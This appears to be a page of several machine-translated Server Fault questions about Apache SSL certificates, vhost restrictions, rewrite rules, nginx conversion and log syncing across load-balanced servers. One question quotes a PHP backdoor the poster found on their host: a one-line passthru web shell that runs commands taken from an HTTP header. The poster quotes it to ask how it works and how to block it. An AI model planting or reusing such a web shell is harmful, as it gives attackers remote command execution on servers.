如何将Apache 2(在Ubuntu 10.04上)configuration为使用客户端证书身份validation(其中我的域(secure.somedomain.com)由第三方信任的SSL证书进行保护,并且客户端证书由我自己的CA颁发? 当我尝试使用第三方可信SSL证书(/ C = US / O = GeoTrust,Inc. / CN = RapidSSL CA)时,我得到错误,因为我认为SSLCACertificateFile冲突!?!? 结果来自:$ openssl s_client -state -debug -showcerts -verify 0 -connect secure.somedomain.com depth=1 /C=US/O=GeoTrust, Inc./CN=RapidSSL CA verify error:num=20:unable to get local issuer certificate verify return:0 我的apache conf文件: <VirtualHost *:443> ServerAdmin [email protected] ServerName secure.somedomain.com SSLEngine On SSLCertificateFile /var/websites/ssl/certificate.cer SSLCertificateKeyFile /var/websites/ssl/key.key SSLCACertificateFile /var/websites/ssl/intermediate.cer […]
我有一个奇怪的问题,我希望有人能帮助! 我刚刚移动了服务器(都运行Apache 2.2的Linux),并重新安装了所有东西,几乎所有东西都在备份和运行,但是当SSL证书显示正确时(网页浏览器正在获取挂锁等) 除了 Windows XP上的IE 8 之外的所有浏览器。 似乎没有IE8不信任我拥有它的证书 – 似乎是这个浏览器从我的ssl.conf中看到默认的(自签名的)SSLCertificateKeyFile,而不是在httpd.conf中指定的,这导致了IE8中显示的安全错误。 同样来自两个基于网页的SSL检测器,当我使用完全相同的域名时,一个会显示我的正确的GeoTrust证书,另一个会显示自签名的证书! 我在一周前更改了DNS,所以我不认为是这样,再加上IE8为自签名证书提供的证书详细信息与服务器上的自签名证书相匹配。 任何帮助将不胜感激,因为这真的让我难住! 谢谢 斯图尔特
我在apache中为静态文件设置了一个虚拟主机。 所以我不会添加一个PHP处理程序,这很好。 但是,是否有可能configuration虚拟主机接受只有JPG,GIF和PNG的请求,或至less抛出404的任何PHP文件请求? 谢谢
我在主机上find了一个php后门程序。 <? passthru(getenv(HTTP_ACCEPT_TROLOLO)); ?> 我看到访问日志中的请求,该PHP文件是POST请求,但我不知道该variables的SETENV如何设置; 有人可以解释如何设置这样的variables,如果可能的话,我可以在服务器端限制/禁止设置这些variables。 谢谢 -H。
对不起,骨头Q.但我很less需要重新安装我的服务器:) 我希望启用phpinfo()函数。 我的php.iniconfiguration文件有disable_functions指令空白 – 我明白是closures这个function的方法 。 除了这个指令在我的php.iniconfiguration中是空白的。 其他的PHP文件正在正确的服务。 是什么赋予了?
我问了堆栈溢出问题,然后我发布了serverfault会更合适,我很抱歉,如果有人绊倒这两个问题。 所以,我现在正在将我的networking平台从单机重build到一个机器集群,我将使用Apache负载平衡来做到这一点,但是我有两个问题,在继续之前我需要一个很好的答案。 我已经在谷歌search和search,但没有发现什么好的。 我的设置将是运行Apache负载平衡服务器(即Apache与mod_proxy),然后任何数量的“奴隶”机器,即平衡成员的Debian机器。 所有这些都是VMWare机器内的VPS,所以根据需要设置新的从站将是微不足道的。 日志文件第一个问题是日志文件的问题。 为了排查我的平台,我有时需要分析来自Apache的日志文件,访问日志和错误日志。 当负载均匀分布(即我不知道是否会使用粘滞平衡,任何主机都可能随时处理任何请求),每个从属Apache实例的日志文件也是如此。 有没有办法整合这些live ,这意味着我的活动日志分析器可以看到来自所有主机的日志文件? 我当然明白,这样做,而在几个主机上的文件将是困难的,所以有办法确保所有的日志文件保存在一台服务器上? 我自己在想两件事情,但是我会非常感谢你的意见。 syslogd第一个是syslogd,在这里可以有多个主机写入一个日志logging主机。 这个问题是,在我目前的设置中,Apache中的每个虚拟主机都有自己的日志文件。 这可能可能以某种方式修复。 我的主要用法是为了排除故障,而不是为每个主机保留单独的日志(尽pipe如果两个目标都能被满足,那肯定会是一个奖励)。 NFS我的下一个想法是关于NFS,即在局域网上有一个NFS共享,每个从站可以写入同一个日志文件。 我将继续,并假设这将是困难的,因为奴隶1将打开日志文件,然后奴隶2将无法写入它。 正如我所说,你的意见是非常感谢,因为我觉得我卡在如何解决这个问题。 configuration文件这是另一回事。 每个从机都会响应每个请求,就好像作为一台服务器一样。 这是整个想法。 但是,如何更改apacheconfiguration文件,添加虚拟主机,设置其他参数? 如果我有十个奴隶,五十个呢? 有没有办法确保所有这些奴隶始终保持同步? 我已经使用NFS导出来确保它们都具有相同的文件,但是我应该使用与configuration文件相同的方法吗? 或者我应该有这些作为一种forms的存储库,然后使用rsync将它们复制到奴隶? 一个问题是,我在我的Web平台中构build了一个接口,用于编辑这些configuration文件(即带有虚拟主机的文件),并且由于该操作将发生在其中一个从属设备上,因此该文件的最新副本可能会潜在在一个奴隶上。 我意识到这是一个漫长而又浪费的职位,我很抱歉。 我只是想确保我的问题的所有参数都被expression出来。 我希望有人能帮助我,就像以前一样! 先谢谢你!
我需要将这个.htaccess转换为Nginx格式,如果可以的话,请指导我。 DirectoryIndex index.php FileETag none ServerSignature Off Options All -Indexes <IfModule mod_rewrite.c> RewriteEngine On RewriteRule ^([0-9a-zA-Z]{1,6})$ links/?to=$1 [L] RewriteRule ^([0-9]{1,9})/banner/(.*)$ links/?uid=$1&adt=2&url=$2 [L] RewriteRule ^([0-9]{1,9})/(.*)$ links/?uid=$1&adt=1&url=$2 [L] </IfModule> 再次感谢…
我想在网站的根目录(/)上设置带有WSGI和Apache的Django,但是我希望通过WSGI(和Django)只将那些没有相应文件的URL直接提供给Apache服务器。 对于PHP我会做这样的事情: RewriteCond %{REQUEST_FILENAME} !-f 然后重写一些index.php什么的。 但如何与WSGI做到这一点?
我正在重新从堆栈溢出我的问题,因为这实际上是更合适的地方来问这个问题。 原来的问题在下面。 这是我正在使用的重写规则: RewriteCond %{SERVER_PORT} ^443$ RewriteCond %{HTTP_HOST} !^(www.)secure.\ [NC] RewriteRule (.*) https://secure.%{HTTP_HOST}%{REQUEST_URI} [R,L] 如果端口是443(SSL端口),并且请求的域不是以secure或www.secure开始,则应该应用此规则。 相反,它redirect到secure.secure,然后返回一个404错误。 另外,如果我删除安全从重写规则创build RewriteCond %{SERVER_PORT} ^443$ RewriteCond %{HTTP_HOST} !^(www.)secure.\ [NC] RewriteRule (.*) https://%{HTTP_HOST}%{REQUEST_URI} [R,L] 我得到了太多的redirect错误。 我承认,我不是一个mod_rewrite专家,但我认为自己能够参考文档的function。 不过在这个问题上,我很难过。 谢谢!
我知道有很多教程在那里build议在端口80上使用nginx或lighttpd,并在不同的端口上运行代理dynamic请求。 我还没有准备好为我的VPS做这个飞跃。 不过,我可以肯定地尝试相反的情况。 即使用Apache的mod_proxy代理请求到不同的端口上运行的nginx / lighttpd。 但是,这甚至是有道理的吗? 如果我使用反向设置,会有性能增益吗?